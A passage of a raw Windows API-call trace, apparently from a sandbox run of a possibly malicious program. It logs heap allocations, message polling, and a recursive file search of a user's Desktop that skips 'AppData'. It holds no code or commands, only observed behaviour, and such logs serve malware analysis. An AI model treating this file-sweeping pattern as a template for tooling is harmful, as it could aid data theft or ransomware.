lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0073.009] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0073.009] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a70 | out: hHeap=0x650000) returned 1 [0073.009] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dba8 [0073.009] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690a70 [0073.009] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbf8 [0073.009] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa60 [0073.009] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690a30 [0073.009] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a8e0 [0073.009] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76aa00 [0073.009] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd10 [0073.009] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a9a0 [0073.009] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b20 [0073.009] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc98 [0073.009] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a9d0 [0073.009] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ae0 [0073.009] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9d0 | out: hHeap=0x650000) returned 1 [0073.010] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dcc0 [0073.010] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b738 [0073.010] PeekMessageW (in: lpMsg=0x61e72c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e72c) returned 0 [0073.010] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddb0 [0073.010] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a9d0 [0073.010] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ab0 [0073.010] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a9b8 [0073.010] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690af0 [0073.010] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690af0 | out: hHeap=0x650000) returned 1 [0073.010] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690af0 [0073.010] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.010] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.010] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690af0 | out: hHeap=0x650000) returned 1 [0073.010] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8a38 [0073.010] PeekMessageW (in: lpMsg=0x61e72c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e72c) returned 0 [0073.010] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690af0 [0073.010] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a9e8 [0073.010] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.010] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0073.010] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b30 [0073.010] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b30 | out: hHeap=0x650000) returned 1 [0073.010] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a7c0 [0073.010] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop", cchCount1=7, lpString2="AppData", cchCount2=7) returned 3 [0073.011] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9e8 | out: hHeap=0x650000) returned 1 [0073.011] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a7c0 | out: hHeap=0x650000) returned 1 [0073.011] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0073.011] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.011] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690af0 | out: hHeap=0x650000) returned 1 [0073.011] PeekMessageW (in: lpMsg=0x61e72c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e72c) returned 0 [0073.011] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8a38 | out: hHeap=0x650000) returned 1 [0073.011] PeekMessageW (in: lpMsg=0x61e72c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e72c) returned 0 [0073.011] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690af0 [0073.011] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690af0 | out: hHeap=0x650000) returned 1 [0073.011] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b738 | out: hHeap=0x650000) returned 1 [0073.011] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0073.011] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ae0 | out: hHeap=0x650000) returned 1 [0073.011] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc98 | out: hHeap=0x650000) returned 1 [0073.011] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9a0 | out: hHeap=0x650000) returned 1 [0073.011] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b20 | out: hHeap=0x650000) returned 1 [0073.011] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd10 | out: hHeap=0x650000) returned 1 [0073.011] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9b8 | out: hHeap=0x650000) returned 1 [0073.011] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9d0 | out: hHeap=0x650000) returned 1 [0073.011] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ab0 | out: hHeap=0x650000) returned 1 [0073.011] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddb0 | out: hHeap=0x650000) returned 1 [0073.011] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa00 | out: hHeap=0x650000) returned 1 [0073.011] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a70 | out: hHeap=0x650000) returned 1 [0073.011] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a30 | out: hHeap=0x650000) returned 1 [0073.011] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dba8 | out: hHeap=0x650000) returned 1 [0073.011] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa60 | out: hHeap=0x650000) returned 1 [0073.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a8e0 | out: hHeap=0x650000) returned 1 [0073.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbf8 | out: hHeap=0x650000) returned 1 [0073.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a80 | out: hHeap=0x650000) returned 1 [0073.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690aa0 | out: hHeap=0x650000) returned 1 [0073.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0073.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a90 | out: hHeap=0x650000) returned 1 [0073.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b10 | out: hHeap=0x650000) returned 1 [0073.012] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0073.012] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b10 [0073.012] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0073.012] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0073.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0073.012] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b10 | out: hHeap=0x650000) returned 1 [0073.012] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbf8 [0073.012] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690b10 [0073.012] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dba8 [0073.012] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a8e0 [0073.012] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690a90 [0073.012] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa60 [0073.012] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690aa0 [0073.012] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa00 [0073.012] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690a80 [0073.012] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.012] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a9d0 [0073.013] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690a30 [0073.013] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d3480 [0073.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9d0 | out: hHeap=0x650000) returned 1 [0073.013] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a9d0 [0073.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9d0 | out: hHeap=0x650000) returned 1 [0073.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a80 | out: hHeap=0x650000) returned 1 [0073.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690aa0 | out: hHeap=0x650000) returned 1 [0073.013] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690aa0 [0073.013] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a9d0 [0073.013] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690a80 [0073.013] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a9b8 [0073.013] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690a70 [0073.013] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a9a0 [0073.013] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690ab0 [0073.013] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a7c0 [0073.013] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b20 [0073.013] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ae0 [0073.013] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ae0 | out: hHeap=0x650000) returned 1 [0073.013] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b20 | out: hHeap=0x650000) returned 1 [0073.013] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76a9e8 [0073.013] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddb0 [0073.014] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a8f8 [0073.014] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b20 [0073.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a8f8 | out: hHeap=0x650000) returned 1 [0073.014] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd10 [0073.014] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc98 [0073.014] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a8f8 [0073.014] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ae0 [0073.014] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b288 [0073.014] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2a0 [0073.014] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dcc0 [0073.014] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a778 [0073.014] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690af0 [0073.014] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dce8 [0073.014] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b180 [0073.014] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ac0 [0073.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b180 | out: hHeap=0x650000) returned 1 [0073.014] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc48 [0073.014] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc20 [0073.014] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b180 [0073.014] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b30 [0073.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b180 | out: hHeap=0x650000) returned 1 [0073.014] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc70 [0073.014] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd60 [0073.014] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b180 [0073.015] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b70 [0073.015] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1f8 [0073.015] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b738 [0073.015] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.015] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd88 [0073.015] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a988 [0073.015] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b00 [0073.015] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b210 [0073.015] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a868 [0073.015] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd38 [0073.015] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a6d0 [0073.015] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690a50 [0073.015] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a958 [0073.015] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0073.015] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2e8 | out: hHeap=0x650000) returned 1 [0073.015] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0073.015] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.015] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0073.015] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b90 | out: hHeap=0x650000) returned 1 [0073.015] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xc1a62260, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc1a62260, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8a38 [0073.016] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xc1a62260, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc1a62260, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0073.016] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdf770280, ftCreationTime.dwHighDateTime=0x1d5e66d, ftLastAccessTime.dwLowDateTime=0x112dad50, ftLastAccessTime.dwHighDateTime=0x1d5dbd9, ftLastWriteTime.dwLowDateTime=0x112dad50, ftLastWriteTime.dwHighDateTime=0x1d5dbd9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="-bwOHNgAEohzwnBTD", cAlternateFileName="-BWOHN~1")) returned 1 [0073.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0073.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d34d8 | out: hHeap=0x650000) returned 1 [0073.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b80 | out: hHeap=0x650000) returned 1 [0073.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b300 | out: hHeap=0x650000) returned 1 [0073.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2e8 | out: hHeap=0x650000) returned 1 [0073.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0073.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ad0 | out: hHeap=0x650000) returned 1 [0073.016] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0073.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b80 | out: hHeap=0x650000) returned 1 [0073.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ad0 | out: hHeap=0x650000) returned 1 [0073.016] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ad0 | out: hHeap=0x650000) returned 1 [0073.016] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b80 | out: hHeap=0x650000) returned 1 [0073.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2e8 | out: hHeap=0x650000) returned 1 [0073.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0073.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ad0 | out: hHeap=0x650000) returned 1 [0073.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b300 | out: hHeap=0x650000) returned 1 [0073.017] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb790 | out: hHeap=0x650000) returned 1 [0073.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0073.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ad0 | out: hHeap=0x650000) returned 1 [0073.017] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb790 | out: hHeap=0x650000) returned 1 [0073.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0073.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ad0 | out: hHeap=0x650000) returned 1 [0073.017] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.017] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0073.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e20 | out: hHeap=0x650000) returned 1 [0073.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0073.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b330 | out: hHeap=0x650000) returned 1 [0073.017] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0073.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c20 | out: hHeap=0x650000) returned 1 [0073.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.017] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0073.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c30 | out: hHeap=0x650000) returned 1 [0073.017] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-bwOHNgAEohzwnBTD", cchCount1=17, lpString2="AppData", cchCount2=7) returned 3 [0073.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b360 | out: hHeap=0x650000) returned 1 [0073.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b378 | out: hHeap=0x650000) returned 1 [0073.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0073.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c20 | out: hHeap=0x650000) returned 1 [0073.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.018] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0073.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8af8 | out: hHeap=0x650000) returned 1 [0073.018] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0073.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0073.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dea0 | out: hHeap=0x650000) returned 1 [0073.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bf0 | out: hHeap=0x650000) returned 1 [0073.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de78 | out: hHeap=0x650000) returned 1 [0073.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b318 | out: hHeap=0x650000) returned 1 [0073.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690be0 | out: hHeap=0x650000) returned 1 [0073.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de50 | out: hHeap=0x650000) returned 1 [0073.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0073.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b330 | out: hHeap=0x650000) returned 1 [0073.018] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.018] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0073.018] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.018] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\*", lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdf770280, ftCreationTime.dwHighDateTime=0x1d5e66d, ftLastAccessTime.dwLowDateTime=0x112dad50, 